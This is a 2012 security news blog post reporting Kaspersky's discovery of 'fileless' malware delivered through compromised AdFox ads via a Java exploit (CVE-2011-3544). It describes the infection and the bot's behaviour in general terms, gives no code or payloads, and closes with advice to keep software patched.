Thursday, March 22, 2012

Java-Based 'Fileless' Malware Served via Compromised Site Ads

What’s more annoying than advertisements on a website?

Answer: Advertisements that infect your computer with “fileless” malware that’s completely capable of dodging the watchful eye of your antivirus software.

Kaspersky Lab discovered that an advertisements served through third-party ad network, AdFox contained malicious JavaScript code that would load an iframe containing an exploit for a known Java vulnerability (CVE-2011-3544).

Typically a Trojan dropper or downloader would be saved onto the hard-drive during the infection process, however this attack sets itself apart from the norm by injecting an encrypted dynamic link library (DLL) into an active Java process instead.

Therefore, the malware is active only in memory and is operational as long as the computer is not restarted – not that it’s a problem considering there’s a good chance that the user will revisit the infected site anyway.

Following a successful infection (which doesn't require any action on the user's part), the ‘fileless’ malware will begin operating as a bot: transmitting a user’s browsing history and a range of other technical information to a command and control server and attempting to disable UAC (user access control) in order to download and install Trojan-Spy.Win32.Lurk (“Lurk”) onto the system.

Fileless Malware Payload

During their investigation, Kaspersky Labs contacted AdFox, who found that the offending advertisement was a result of a cybercriminal using an AdFox customer’s account to modify the code of news headline banners to include the malicious code. The bad code has been removed and all is well again.

While this particular attack was targeting Russian users, it’s entirely possible for the very same exploit and corresponding fileless bot to be used to target users in other countries.

For the record, the Java vulnerability exploited in this attack was patched in October 2011 and yet it was still successful. So, make sure you keep all third-party software installed on your machine fully patched and up-to-date!

Don’t miss out on the latest tech news and computer security alerts! Follow us on Twitter at @hyphenet,  “Like” us on Facebook or add us to your circle on Google+.

No comments:

Post a Comment